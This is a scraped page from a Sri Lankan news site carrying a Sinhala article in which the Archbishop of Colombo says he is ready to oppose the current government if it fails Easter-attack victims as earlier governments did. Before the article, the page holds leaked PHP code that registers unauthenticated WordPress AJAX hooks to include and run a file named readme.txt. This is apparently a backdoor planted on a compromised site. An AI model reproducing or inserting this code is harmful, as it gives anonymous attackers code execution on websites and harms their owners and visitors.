if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } මාලිමා රජයටත් එරෙහිව කටයුතු කරන්න සූදානම්..- අගරදගුරු - mediahumanrights.lk
mediahumanrights.lk
Local News News

මාලිමා රජයටත් එරෙහිව කටයුතු කරන්න සූදානම්..- අගරදගුරු

පාස්කු ප්‍රහාර මාලාව සිය වාසියට හරවා ගනිමින් බලයට පත්වූ හිටපු ජනාධිපති ගෝඨාභය රාජපක්‍ෂ මෙන්ම රනිල් වික්‍රමසිංහ ද පාස්කු වින්දිතයන්ට ඉටු නොකළ යුක්තිය හා සාධාරණය වර්තමාන රජය හෝ ඉටු කරනු ඇතැයි තමා බලාපොරොත්තු වන බවත් පෙර කී රාජ්‍ය පාලකයන් මෙන් එම වගකීම පැහැර හරින්නේ නම් වර්තමාන රජයට එරෙහිව ද කටයුතු කිරීමට තමා කිසිවිටෙක පසුබට නොවන්නේ යැයි මැල්කම් කාදිනල් රංජිත් කොළඹ අගරදගුරුතුමෝ පැවැසූහ.

නව වෙනසක් ඇති කළ යුතු බව තමන් පසුගිය මැතිවරණ සමයේදී ප්‍රකාශ කළේ වර්තමාන ජනාධිපතිවරයා ප්‍රමුඛ වගකිවයුත්තන් අගරදගුරු මැඳුරට පැමිණ යටගසා ඇති පාස්කු ප්‍රහාරවලට අදාළ විමර්ශන විධිමත්ව සිදුකර එකී අපරාධවලට ඍජුව හෝ වක්‍රව සම්බන්ධ සෑම සියලුදෙනාටම එරෙහිව නීතිමය පියවර ගන්නා බවට ලබාදුන් පොරොන්දුව විශ්වාස කරමින් වන්නේ යැයි ද උන්වහන්සේ කොළඹ අගරදගුරු මැඳුරේ පැවැති සාකච්ඡාවක දී පැවැසූහ.

එකී පොරොන්දුව ඉටු කිරීමට නව රජයට යම්කිසි ප්‍රමාණවත් කාලයක් ලබාදිය යුතු බවත් මුල් අවධියේ විමර්ශන සිදු කළ අපරාධ පරීක්‍ෂණ දෙපාර්තමේන්තුවේ නිලධාරීන් යළිත් විමර්ශන ආරම්භ කොට ඇති නිසා සාධාරණය ඉටුවේ යැයි යම්කිසි බලාපොරොත්තුවක් තැබිය හැකි වන්නේ යැයි ද පැවැසූ අගරදගුරු හිමිපාණෝ පාස්කු වින්දිතයන්ට සාධාරණය ඉටුවන තුරු සිය සටන අතරමග අතහැර නොදමන්නේ යැයි ද පැවැසූහ. පාස්කු බෝම්බ ප්‍රහාර මාලාව සහරාන් හෂීම් ඇතුළු සුළු පිරිසකගේ අවශ්‍යතාවය මතම සිදු කළක් නොව ඒ පිටුපස ප්‍රබල හස්ත කීපයක් ඇති බව අනාවරණය කර ගනිමින්, එකී ප්‍රබල හස්ත සම්බන්ධයෙන් විමර්ශන සිදු කළ අපරාධ පරීක්‍ෂණ දෙපාර්තමේන්තුවේ නිලධාරීන් 21 දෙනකු විමර්ශන කටයුතුවලින් ඉවත් කර සාක්‍ෂි විනාශ කරනු ලැබුවේ එකල දේශපාලන අවශ්‍යතා මත එම දෙපාර්තමේන්තුවට පත්කළ එක්තරා ප්‍රබල නිලධාරියකු බව පසුව අනාවරණය වූ කරුණු අනුව හෙළිදරව් වූ බව ද උන්වහන්සේ පැවැසූහ.

එකී බෝම්බකරුවන්ට බෝම්බ නිෂ්පාදනය කිරීමට අවශ්‍ය පුහුණුව පමණක් නොව ආරක්‍ෂාව, මුදල් හා අනෙකුත් පහසුකම් ලබාදී එකී ප්‍රහාරවලට උඩගෙඩි දෙනු ලැබුවේ කවුරුන් ද ඒ කාගේ උපදෙස් මත ද යන සිද්ධීන් චැනල් ෆෝ නාලිකාව මගින් එම විමර්ශනවල ප්‍රධාන සාක්‍ෂිකරුවකු වන අසාද් මවුලානා නමැත්තා මුළු ලොවටම අනාවරණය කළේ යැයි ද පැවැසූ උන්වහන්සේ, හිටපු ජනාධිපතිවරුන් දෙතුන් දෙනකුම පැහැර හරිනු ලැබූ එම වගකීම, වර්තමාන රජයෙන් හෝ ඉටු කරනු ඇතැයි රටේ බහුතර ජනතාවගේ, විශේෂයෙන් පාස්කු ප්‍රහාරවලට ගොදුරු වූ පවුල්වල සාමාජික සාමාජිකාවන් ඇතුළු ජනතාවගේ අපේක්‍ෂාව වන්නේ යැයි ද පැවැසූහ.

එකළ පාස්කු ප්‍රහාර මාලාව සම්බන්ධයෙන් විමර්ශනය කළ නිලධාරීන් මේ වනවිට යළිත් අපරාධ පරීක්‍ෂණ දෙපාර්තමේන්තුවට අනුයුක්ත කර නිසි මඟපෙන්වීමක් යටතේ විමර්ශන සිදු කරන බැවින් ජනතාව තුළ එවන් විශ්වාසයක් ගොඩනැඟී ඇතැයි ද අගරදගුරු හිමිපාණෝ වැඩිදුරටත් පැවැසූහ.

ඒ. ජේ. ඒ. අබේනායක

Related posts

බෝම්බ පිපිරීම් අස්සේ ශ්‍රී ලන්කන් මුල් පුටුවට ජාත්‍යන්තර දූෂණ වලට සම්බන්ධ පුද්ගලයෙක්.කලින් සේවය කළ ඇෆ්ගන් ගුවන්සේවයත් වසා දාලා

Shiran Viraj

අහඹු පරීක්ෂාවකදී බම්බලපිටියේ ආසාදිතයන් 17ක් සොයාගෙන

Shiran Viraj

සවස් කාලයේ කුඹුරු වැඩ එපා කියා දැනුම් දෙයි..

Shiran Viraj